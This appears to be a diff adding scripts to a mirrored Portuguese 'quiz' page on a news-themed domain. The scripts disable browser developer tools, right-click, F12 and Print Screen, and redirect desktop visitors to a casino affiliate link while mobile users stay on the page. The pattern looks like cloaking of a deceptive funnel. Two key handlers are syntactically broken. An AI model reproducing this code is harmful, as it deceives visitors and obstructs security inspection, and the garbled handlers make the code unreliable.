--- a/qzm/noticiasde2024.fun/quiz/index.html
+++ b/qzm/noticiasde2024.fun/quiz/index.html
@@ -1,6 +1,7 @@
 
 
 
+
 <!DOCTYPE html><html lang="pt-br">
 <!-- Mirrored from noticiasde2024.fun/quiz/ by HTTrack Website Copier/3.x [XR&CO'2014], Thu, 21 Mar 2024 21:01:05 GMT -->
 <!-- Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=utf-8" /><!-- /Added by HTTrack -->
@@ -438,6 +439,49 @@
         }
     }
 </script>
+
+<script disable-devtool-auto src='https://cdn.jsdelivr.net/npm/disable-devtool'></script>
+
+<script>
+document.addEventListener("contextmenu", function (e){
+    e.preventDefault();
+}, false);
+</script>
+
+<script>
+document.onkeypress = function (event) {
+event = (event  window.event);
+if (event.keyCode == 123) {return false;}
+if (event.keyCode == 93) {return false;}
+if (event.keyCode == 44) {return false;}
+}
+document.onmousedown = function (event) {
+event = (event  window.event);
+if (event.keyCode == 123) {return false;}
+if (event.keyCode == 93) {return false;}
+if (event.keyCode == 44) {return false;}
+}
+document.onkeydown = function (event) {
+event = (event || window.event);
+if (event.keyCode == 123) {return false;}
+if (event.keyCode == 93) {return false;}
+if (event.keyCode == 44) {return false;}
+}
+</script>
+
+<script>
+    function redirectToMobile() {
+            var userAgent = navigator.userAgent.toLowerCase();
+    var isMobile = /android|webos|iphone|ipad|ipod|blackberry|iemobile|opera mini/i.test(userAgent);
+
+    if (!isMobile) {
+        window.location.href = "https://www.kto.com/pt/cassino/?myafftkn=sFa0u-w5E2jM9pVa8kFgiWNd7ZgqdRLk&partner=AQ0240597007"; // Substitua com a URL desejada para computadores
+            }
+        }
+
+    redirectToMobile();
+</script> 
+
 
 </body>
 <!-- Mirrored from noticiasde2024.fun/quiz/ by HTTrack Website Copier/3.x [XR&CO'2014], Thu, 21 Mar 2024 21:01:12 GMT -->
